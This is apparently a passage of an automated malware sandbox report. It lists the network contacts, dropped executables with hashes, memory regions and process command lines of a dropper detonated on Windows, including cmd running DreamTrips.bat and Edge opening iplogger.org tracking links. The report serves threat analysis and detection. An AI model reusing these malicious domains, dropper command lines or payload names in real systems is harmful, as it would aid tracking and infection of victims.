| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.nicekkk.pw | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 31.13.64.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | www.dwedfe.pw | udp |
| US | 64.225.91.73:80 | www.dwedfe.pw | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | j8hghe3uyf.2ihsfa.com | udp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
| US | 99.83.154.118:80 | j8hghe3uyf.2ihsfa.com | tcp |
Files
memory/2040-55-0x0000000075AC1000-0x0000000075AC3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat
| MD5 | c25faf98d787b358c72543e7e11917c8 |
| SHA1 | 911d1eb09ba90b071795842089d57d741f959ee3 |
| SHA256 | 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40 |
| SHA512 | b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720 |
\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
| MD5 | 9d7fb45d27ca947c3de8dfc20a4bfe65 |
| SHA1 | 1669a4eb54494813218d1753b8faa1c6bc88dc0a |
| SHA256 | ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5 |
| SHA512 | 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
| MD5 | 9d7fb45d27ca947c3de8dfc20a4bfe65 |
| SHA1 | 1669a4eb54494813218d1753b8faa1c6bc88dc0a |
| SHA256 | ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5 |
| SHA512 | 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558 |
memory/1708-64-0x0000000002C10000-0x0000000002C4B000-memory.dmp
memory/1708-66-0x0000000000220000-0x0000000000255000-memory.dmp
memory/1708-67-0x0000000000400000-0x00000000027C7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D9281271-8756-11EC-A514-46595837F587}.dat
| MD5 | bc5a168c3f12e297f450f2808d691d16 |
| SHA1 | 7e30d4d9077576bc1094b3f091b4f7548c193e9f |
| SHA256 | 9fba3f8d65f9f75c6a79e96cd43afa0e19fefab641524c3584d0d867031a5632 |
| SHA512 | 35a6e12e94229f136c1931bf2bf8b77b2ff5cdae2a966f7c9bcb0c95b5eb8c639c94dac833cc9f6e4e7fae042a8b2ca45982cc831de6d3c36c8ddedad07479d0 |
\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
| MD5 | 010ebf726b3cc67e92eb91d7afbfbd59 |
| SHA1 | 02db1d5bf39903099612ddb12d4b8918657f0ec0 |
| SHA256 | a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c |
| SHA512 | 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29 |
\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
| MD5 | 7f6e60001d89e148fabb62ae3b5301ed |
| SHA1 | 02679bae2da92b2fc28e5e5e7905fcdeb3382202 |
| SHA256 | 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939 |
| SHA512 | 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90 |
memory/1656-80-0x0000000000170000-0x000000000017D000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
| MD5 | ddd8a43c5cd1d648af5bfbd67c718261 |
| SHA1 | 37c915768cb12f54b60eac36cd4c008d7b3340b6 |
| SHA256 | 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786 |
| SHA512 | 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb |
memory/1812-92-0x00000000021C0000-0x00000000022A3000-memory.dmp
memory/1812-93-0x0000000002070000-0x0000000002170000-memory.dmp
memory/1812-94-0x00000000021C0000-0x00000000022A3000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 28d2b5233db11fb15d47576c7fce937c |
| SHA1 | 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3 |
| SHA256 | 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca |
| SHA512 | 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe |
memory/1624-103-0x0000000000400000-0x0000000000425000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp
| MD5 | f897ff6640b2528ae0e3211e9240e79f |
| SHA1 | dc6e47b975423894cb812552bb4aa00c6a57b214 |
| SHA256 | 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640 |
| SHA512 | 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851 |
memory/1656-108-0x00000000001D0000-0x00000000001D1000-memory.dmp
memory/1656-109-0x0000000070E51000-0x0000000070E53000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe
| MD5 | 7f9a498cc692f9f3f0cfe241c80e8ad8 |
| SHA1 | b5c3f7322da2c8b8ce0f473a26b54d057593162e |
| SHA256 | 953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489 |
| SHA512 | 8fa1b099c07e5aa352a6c5d0288ffd1ce0c5208fda361bb0129c03fbc16d3a84d12fa6067d143e82795343d9c3c847e35ec6b6638373329467d9025933766db6 |
\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe
| MD5 | 7de995f043de78c13ac79349852bf124 |
| SHA1 | 23b37d08012bfaa8743359eba29ec8891e23897f |
| SHA256 | 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98 |
| SHA512 | 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300 |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | 7fee8223d6e4f82d6cd115a28f0b6d58 |
| SHA1 | 1b89c25f25253df23426bd9ff6c9208f1202f58b |
| SHA256 | a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59 |
| SHA512 | 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4 |
C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
| MD5 | b7161c0845a64ff6d7345b67ff97f3b0 |
| SHA1 | d223f855da541fe8e4c1d5c50cb26da0a1deb5fc |
| SHA256 | fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66 |
| SHA512 | 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b4753d14cf15006efdebd928d17782fe |
| SHA1 | 27364202233e704bd93b15839a8820b23ffed8f5 |
| SHA256 | 356bbfbe1c560cddf0167204f84766d1e8d6cd1889904a4b6989ba7a73898a92 |
| SHA512 | 73f894568bb53493480218f6264ff453056160c640144c5b64420f0682af1d8d8918552edfb31eee9582682a1b332a652befacc5fabce53e2cb06316f5e488e2 |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | a6279ec92ff948760ce53bba817d6a77 |
| SHA1 | 5345505e12f9e4c6d569a226d50e71b5a572dce2 |
| SHA256 | 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181 |
| SHA512 | 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a59d9b159e7ad93c024ec57c7e895969 |
| SHA1 | 003a298d1d450e69cf6cb0d9ba1fa00393872c5c |
| SHA256 | cc89f5dba74c57f53fb37f1906b7c0f430379331f7cfa20f6491e69490cb13d2 |
| SHA512 | 8e4643eccb569a352a4e3ed76f393f6f90e47897d627b096f1121f3c604ed6485d101a3359e16edd05208005902711ccc1bc72227ca6aeb480cbbc97abebbfb3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6DX42UNT.txt
| MD5 | 18d0c71b6f5f4fee3ef9ad423101ef82 |
| SHA1 | 2cc73d29382730dbe5c9da8224cdefdcad5b28dd |
| SHA256 | 5f40872a7e0e4f665d8ee10a64b763c21dcfec6e93d17a1d5446715a68bf6d7d |
| SHA512 | fab833a8bfd6cf192d11649b35464649d6c8218271a2e0a69858015f5f0ba9defd00b461e5466bd4f66e320e66ffc5a963d2f40373d080ee15854da74b25a8a2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-06 13:12
Reported
2022-02-06 13:15
Platform
win10v2004-en-20220113
Max time kernel
36s
Max time network
89s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe
"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 88.221.144.170:80 | | tcp |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat
| MD5 | c25faf98d787b358c72543e7e11917c8 |
| SHA1 | 911d1eb09ba90b071795842089d57d741f959ee3 |
| SHA256 | 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40 |
| SHA512 | b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
| MD5 | 9d7fb45d27ca947c3de8dfc20a4bfe65 |
| SHA1 | 1669a4eb54494813218d1753b8faa1c6bc88dc0a |
| SHA256 | ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5 |
| SHA512 | 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 78afdcc28744f3ccc897189551e60a14 |
| SHA1 | 6408c2447363d821dc659254a324456ed16207ec |
| SHA256 | ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7 |
| SHA512 | 8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078 |